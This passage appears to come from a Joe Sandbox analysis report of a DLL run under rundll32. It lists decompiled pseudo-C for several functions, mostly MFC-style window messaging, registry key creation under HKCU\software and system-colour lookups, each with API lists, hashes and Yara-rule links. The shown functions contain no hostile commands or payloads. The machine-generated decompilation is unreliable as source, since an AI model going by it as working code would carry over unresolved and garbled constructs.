								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E1000A5E4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E100128D7(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

APIs

GetParent.USER32(?), ref: 1000F720
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F747
UpdateWindow.USER32(?), ref: 1000F761
SendMessageA.USER32 ref: 1000F785
SendMessageA.USER32 ref: 1000F79F
UpdateWindow.USER32(?), ref: 1000F7E5
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000F819

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE8A, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E1000A7CE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E10010DEC(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10057298;
						E10017C83( &_v28, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t37, _t46, _t51);
						_t43 = E10013965(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000CF71(_t43);
						}
						return E10017C60(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

APIs

GetCapture.USER32 ref: 10014232
SendMessageA.USER32 ref: 1001424B
GetFocus.USER32(?,?,?,?,00000000), ref: 1001425D
SendMessageA.USER32 ref: 10014269
GetLastActivePopup.USER32(?), ref: 10014290
SendMessageA.USER32 ref: 1001429B
SendMessageA.USER32 ref: 100142BF

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661

Uniqueness

Uniqueness Score: -1.00%

Function 1000FC8A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FC8A(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1000B510();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E100174D0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000FBD6(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

_memset.LIBCMT ref: 1000FD17
SendMessageA.USER32 ref: 1000FD40
GetWindowLongA.USER32 ref: 1000FD52
GetWindowLongA.USER32 ref: 1000FD63
SetWindowLongA.USER32 ref: 1000FD7F

Strings

(, xrefs: 1000FD36

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013E40, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013E40(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10013e5b
0x10013e62
0x10013e65
0x10013e68
0x10013e6b
0x10013e76
0x10013ead
0x10013ead
0x10013eb8
0x10013ebd
0x10013ebd
0x10013ec2
0x10013ec7
0x10013ec7
0x10013ed0

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
RegCloseKey.ADVAPI32(?), ref: 10013EBD
RegCloseKey.ADVAPI32(?), ref: 10013EC7

Strings

software, xrefs: 10013E56

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10013CEE, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10013CEE(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E10017C83(0, 0);
				_t22 = E100134F9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E10017C60(_t28);
			}

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
__CxxThrowException@8.LIBCMT ref: 10013CFF

Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23

Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB

_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013810, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013810(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x1001381a
0x10013820
0x10013827
0x1001382e
0x10013835
0x10013842
0x10013849
0x1001384c
0x1001384f
0x10013853

APIs

GetSysColor.USER32(0000000F), ref: 1001381C
GetSysColor.USER32(00000010), ref: 10013823
GetSysColor.USER32(00000014), ref: 1001382A
GetSysColor.USER32(00000012), ref: 10013831
GetSysColor.USER32(00000006), ref: 10013838
GetSysColorBrush.USER32(0000000F), ref: 10013845
GetSysColorBrush.USER32(00000006), ref: 1001384C

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40

Uniqueness

Uniqueness Score: -1.00%

Function 10028DE5, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028DE5() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x1005acc4 = _t6;
					return _t6;
				}
			}

0x10028df6
0x10028e00
0x10028e04
0x10028e20
0x10028e20
0x00000000
0x10028e20
0x10028e06
0x10028e0c
0x00000000
0x00000000
0x00000000
0x10028e0e
0x10028e0e
0x10028e13
0x10028e19
0x00000000
0x10028e19

APIs

GetVersion.KERNEL32 ref: 10028DED
GetVersion.KERNEL32 ref: 10028DF8
GetVersion.KERNEL32 ref: 10028E00
GetVersion.KERNEL32 ref: 10028E06
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 10028E13

Strings

MSWHEEL_ROLLMSG, xrefs: 10028E0E

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000C209, Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000C209(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10057a08; // 0xcbf72908
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000C12A(0);
				_t67 = _t72;
				_t63 = E1000C15E(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000C12A(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

APIs

Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8

EnableWindow.USER32(?,00000001), ref: 1000C256
GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
GetCurrentProcessId.KERNEL32 ref: 1000C26E
SendMessageA.USER32 ref: 1000C283
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
EnableWindow.USER32(?,00000001), ref: 1000C33C

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C15E, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
